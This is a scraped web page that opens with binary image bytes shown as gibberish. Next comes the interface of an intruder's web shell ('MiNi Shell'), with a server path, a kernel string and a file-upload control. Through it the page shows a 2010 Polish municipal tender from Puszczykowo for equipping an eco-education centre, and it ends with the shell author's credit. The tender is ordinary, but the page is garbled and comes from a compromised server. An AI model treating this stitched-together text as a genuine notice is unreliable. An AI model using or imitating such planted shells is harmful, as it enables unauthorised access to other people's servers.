JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100803/235624-N-2010.html

<p class="kh_header"><b>Puszczykowo: Dostawa wyposażenia Centrum Eko - Info w Puszczykowie.</b><br>
<b>Numer ogłoszenia: 235624 - 2010; data zamieszczenia: 03.08.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miejski , ul. Podleśna 4, 62-040 Puszczykowo, woj. wielkopolskie, tel. 061 8133225, 8983719, faks 061 8133225.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.puszczykowo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa wyposażenia Centrum Eko - Info w Puszczykowie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa następującego wyposażenia dla potrzeb Eko - Info w Puszczykowie:

1.	Ławka przy ścieżce edukacyjnej  - tożsama lub podobna do istniejących na ścieżce, z oparciem,dąb drewnochron; długość ławki 250 cm; oparcie: wys. 50 cm, szerokość deski (jej wysokość) 60 cm, grubość desek 5 cm; nogi: okrąglaki o przekroju 50 cm - 6 szt.
2.Kosz na śmieci przy ścieżce edukacyjnej - tożsamy lub podobny do istniejących na ścieżce, dąb drewnochron; wys. 60-70 cm; podstawa: 30 cm na 25 cm. - 6 szt.
3.Stojak rowerowy - konstrukcja stalowa, 5 stanowisk - 2 szt.
4.Kaseton świetlny z napisem Eko-Info, z montażem  - 1 szt.
5.Tablica przy wejściu na ścieżkę edukacyjną - stelaż: dąb impregnowany drewnochronem, słupy o przekroju 20 cm, wysokość nad ziemią 220 cm, rygle łączące słupy (4 szt.) 6x14 cm, długość 140 cm.; dach: wysokość 30 cm, spad na stronę 70 cm, długość połaci dachu 270 cm, deski układane zakładkowo - 1 szt.
6.Tablice edukacyjne w gminach Mikroregionu WPN -  tablica dł. 320 cm, wys. 180 cm, stelaż krawędziaki 10x10 cm impregnowane drewnochronem, zadaszenie spad 30 cm - 7 szt. 
Tablice zamontowane zostaną w miejscowościach-siedzibach władz 7 gmin:  Brodnica, Dopiewo, Komorniki, Kórnik, Mosina, Puszczykowo, Stęszew.

7.Lada recepcyjna na planie L- z płyty MDF, wys. 110/75 cm, szer. 70 cm,  dł. 190/120 cm + 70 cm unoszony blat do wejścia za ladę, z montażem - 1 szt.
8.Krzesło obrotowe - regulowana wysokość oparcia i siedziska, podłokietniki, dynamiczne siedzisko i oparcie, na kółkach, średnica 60-65 cm, siedzisko i oparcie tapicerowane - 1 szt.
9.Krzesło zwykłe - konstrukcja stalowa, siedzisko i oparcie tapicerowane - 4 szt.
10.Szafa biurowa - z płyty MDF, 2-drzwiowa zamykana na klucz, półki na akta, szer. 80 cm, głęb. 38-42 cm, wys. 182-192 cm, z montażem  - 1 szt.
11.Regał - z płyty MDF, szer. 90 cm, głęb. 38-42 cm, wys. 182-192 cm, dół 2-drzwiowy zamykany na klucz, z montażem  - 2 szt.
12.Stolik - z płyty MDF, okrągły , średnica 80 cm - 1 szt.

UWAGA! Poz. 8, 11, 12, 13 w jednakowym rodzaju wykończenia .

13.	Infokiosk- procesor Intel 1,5 GHz, pamięć operacyjna 1 GB, dysk twardy 80 GB, napęd DVD, monitor, karta sieciowa, WiFi 54 Mbps, Windows XP, zabezpieczenie przeciwprzepięciowe, szerokość 36-50 cm - 1 szt. 
14.Oprogramowanie infokiosku - aktualizacja istniejącej wirtualnej mapy mikroregionu (http://www.mapapolski.com.pl/wpn/) o wybrane atrakcje przyrodnicze oraz obszary przyrodniczo cenne oraz atrakcje turystyczne z powierzonych materiałów, instalacja aktualizacji w 3 infokioskach  - 1 kpl.
15.Lekcja dendrologii - materiał edukacyjny, np. produkt firmy MENTOR s.c. z Połczyna Zdrój lub równoważny - 1 szt.
16.	Gra edukacyjna ala Oszczędny dom - Gra ukazująca przekrój budynku mieszkalnego oraz życie przeciętnej rodziny: w każdym z pomieszczeń włączone jest światło, sprzęt AGD meble ustawione w niekorzystny sposób. Zadaniem gracza będzie w jak najszybszym czasie odnalezienie i wyłączenie niepotrzebnie działających przedmiotów. Gra może zawierać kilka poziomów np w zależności od wielkości domu oraz liczby mieszkańców, z uruchomieniem - 1 szt.
17.	Puzzle edukacyjne - interaktywne, nt. ochrony środowiska, przyrody, zainstalowanie na stronie internetowej z możliwością pobrania gry na własny komputer, gra powinna zawierać kilka poziomów trudności, np. w zależności od złożoności obrazu oraz ilości elementów (puzzli), z uruchomieniem - 1 szt.
18.	Stojak na ulotki, wymiary wysokość ok 150 cm, szerokość ok 40cm, głębokość ok 40 cm, stelaż aluminium/stal, kieszenie na prospekty reklamowe z pleksi w formacie A4, ilość kieszeni 3 lub więcej - 2 szt.
19.	Ekran LCD z uchwytem ściennym- TV LCD LED 42 FullHD Tuner TV MPEG-4, Wejścia: HDMI, USB (z obsługą JPEG, MP3, DivX HD), RGB D-sub (15pin),uchwyt uniwersalny, regulowany w dwóch płaszczyznach uchwyt do montażu na ścianie telewizorów LCD i Plazma o rozmiarach 20-50 i wadze maksymalnej 70 kg, z uruchomieniem  - 1 szt.
20.	Laptop+kable, listwy, ups z ekranem o przekątnej powyżej 15, charakteryzujący się natywną rozdzielczością powyżej 1366 x 768 z podświetleniem LED. Wyposażony w procesor Intel Core i3-330M o częstotliwości taktowania min. 2 GHz, pamięć RAM DDR3 o wielkości 4GB oraz dysk twardy SATA o pojemności 500 GB. Wbudowana karta graficzna ATI Radeon HD lub nVidia, karta dźwiękowa, napęd DVDRW, kamera internetowa. Wyposażony w złącze HDMI, D-Sub, minimum 3 porty USB 2.0, czytnik kart pamięci. Zainstalowany system Windows 7 64-bit, z uruchomieniem  - 1 szt.
21.	Telefon - stacjonarny bezprzewodowy, zasięg min. 50 m wewnątrz i 300 m na zewnątrz budynku, podświetlany wyświetlacz, książka telefoniczna, lista ostatnich 25 nieodebranych połączeń - 1 szt.
22.	Drukarka - A4, laserowa, kolorowa, rozdzielczość min. 600 dpi, komunikacja USB, z uruchomieniem - 1 szt.
23.	Tablica korkowa 60 x 90 cm - 2 szt.
24.	Linijki  - podziałka, nadruk na drewnie Eko- Info Puszczykowo jako Mikroregion WPN, wykonane z drewna 3 x 21 x 20 cm - 500 szt.
25.	Długopisy drewniane z wkładem do pisania, nadruk Eko- Info Puszczykowo jako Mikroregion WPN - 500 szt.
26.	Zestawy (notatnik + długopis) nadruk  Eko- Info Puszczykowo jako Mikroregion WPN wykonane z makulatury, wymiary notatnika 15 x 21 cm - 500 szt.
27.	Ekologiczna torba bawełniana z nadrukiem Eko- Info Puszczykowo jako Mikroregion WPN, wymiary:36 x 42 cm - 500 szt.
28.	Magnesy  - wymiar: 4 x 4 cm, nadruk Eko- Info Puszczykowo jako Mikroregion WPN - 500 szt.
29.	Karty do gry o środowisku - ( np. Ekologiczny Piotruś) nadruk Eko- Info Puszczykowo jako Mikroregion WPN - 500 kpl.
30.	Folder o Mikroregionie (książeczka)  - z mapą poglądową Mikroregionu, atrakcjami przyrodniczymi i krajobrazowymi 7 gmin Mikroregionu (Brodnica, Dopiewo, Komorniki, Kórnik, Mosina, Puszczykowo, Stęszew), opracowany w konsultacji z Zamawiającym, papier ekologiczny gramatura 80-100, ilość stron 16 - 24, kolorowy, podpisy pod zdjęciami po polsku i angielsku, oprawa szyta, format: 210x297 do A5 - 3 000 szt.
31.	Opracowanie strony www projektu - Opracowanie szaty graficznej strony dostępnej pod adresem www.mikroregionwpn.pl, wdrożenie całości do istniejącego systemu Joomla, stworzenie banerów informujących o projekcie, opracowanie galerii zdjęć z powierzonych materiałów, uzupełnienie nowej witryny o informacje opublikowane dotychczas na istniejącej stronie mikroregionu WPN, z uruchomieniem - 1 szt.
32.	Film nt. ochrony przyrody w Mikroregionie WPN  - wersja DVD oraz wersja internetowa.
	Migawki atrakcji turystycznych, pomników przyrody i obszarów przyrodniczo cennych znajdujących   	się na terenie Mikroregionu WPN (7 gmin: Brodnica, Dopiewo, 	Komorniki, Kórnik, Mosina, 	Puszczykowo, Stęszew) z opisem każdego miejsca.
	Lektor po polsku oraz opcja napisów polskich dla niesłyszących. Czas trwania filmu 	8 - 10 minut , 	z uruchomieniem - 1szt.
33.	Promocja projektu:
	- wykonanie zaproszeń (projekt, wydruk + koperta) - 60 szt., 
	- dostarczenie kijów do nordic walking z umieszczonym na nich logo Mikroregionu WPN oraz logo 	Puszczykowa - 12 kpl., 
	- wykonanie oraz zamontowanie na ścianie budynku tablic informacyjnych, wym.     90 x 70 cm, ze 	spienionego PCV - 2 szt.,
	- wykonanie potykacza w kształcie drzewa reklamującego Mikroregion WPN, służący również jako 	stojak na ulotki - 2 szt., 
	- zaprojektowanie i wydrukowanie plakatów w formacie A2 - 30 szt.

34.	Montaż sprzętu edukacyjnego - dotyczy poz. 1, 2, 3, 5, 6, 13, 15, 19, 20.
UWAGA! Montaż wszystkich dostarczonych urządzeń i sprzętów w miejscach wskazanych przez Zamawiającego w pomieszczeniach Centrum Eko-Info  lub w jego pobliżu (nie dotyczy poz. 6).


Zamawiający wymaga udzielenia 12-miesięcznej gwarancji na materiały będące przedmiotem niniejszego zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 7 ustawy Prawo zamówień publicznych, stanowiących nie więcej niż 20% wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.19.00.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 1.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający wymaga wniesienia wadium.
Ustala się wadium dla całości przedmiotu zamówienia w wysokości: 3.000,00 pln (słownie: trzy tysiące 00/100).</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli Wykonawca wykaże, że w ciągu ostatnich trzech lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał minimum trzy strony www. oraz jeden film promocyjny.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawcy wspólnie ubiegający się o zamówienie:
1)	ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania,
2)	zobowiązani są ustanowić Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia. Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z  oryginałem wszystkich dokumentów;
3)	pełnomocnictwo musi wynikać z umowy lub z innej czynności prawnej, mieć formę pisemną; fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem;

3. Ponadto Wykonawca składa:
1)	wypełniony i podpisany formularz ofertowy ( wg. wzoru stanowiącego załącznik nr 1 do niniejszej specyfikacji) wraz z wykazem materiałów objętych przedmiotem zamówienia,
2)	dowód wniesienia wadium,
3)	upoważnienie w przypadku składania oferty wspólnej do reprezentowania wszystkich podmiotów.
Dokument wniesienia wadium może być złożony przez kilku Wykonawców składających ofertę wspólną, przy czym łącznie musi dawać 100% wymienionej kwoty. W przypadku złożenia wadium w formie poręczenia lub gwarancji przez członków konsorcjum innych niż lider uprawniony do podpisywania Umowy, wadium wystawione musi być na konsorcjum.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość istotnej zmiany postanowień zawartej Umowy w stosunku do treści oferty na podstawie której dokonał wyboru Wykonawcy. Zmiany mogą dotyczyć:

1.    Wydłużenia terminu wykonania przedmiotu Umowy w przypadku zaistnienia okoliczności:
    -  za którą odpowiedzialny jest Zamawiający,
	- niezależnych od stron.
       Przedłużenie terminu wykonania przedmiotu Umowy nastąpi o tyle dni, ile trwała przeszkoda w jej wykonywaniu bez możliwości ubiegania się o odszkodowanie przez Wykonawcę. Podstawą do przesunięcia terminu jest pisemne zawiadomienie Zamawiającego o zaistniałej przeszkodzie lub okoliczności.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.puszczykowo.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Puszczykowie
ul. Podleśna 4 ,62-040 Puszczykowo
 
pon. 8.00-16.00 wt-pt. 7.30-15.30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.08.2010 godzina 10:55, miejsce: Oferty należy składać do dnia 11 sierpnia 2010 roku do godz. 10:55 w: Urzędzie Miejskim w Puszczykowie - kancelaria, budynek A..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Regionalnego Programu Operacyjnego Województwa Wielkopolskiego na lata 2007 - 2013.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com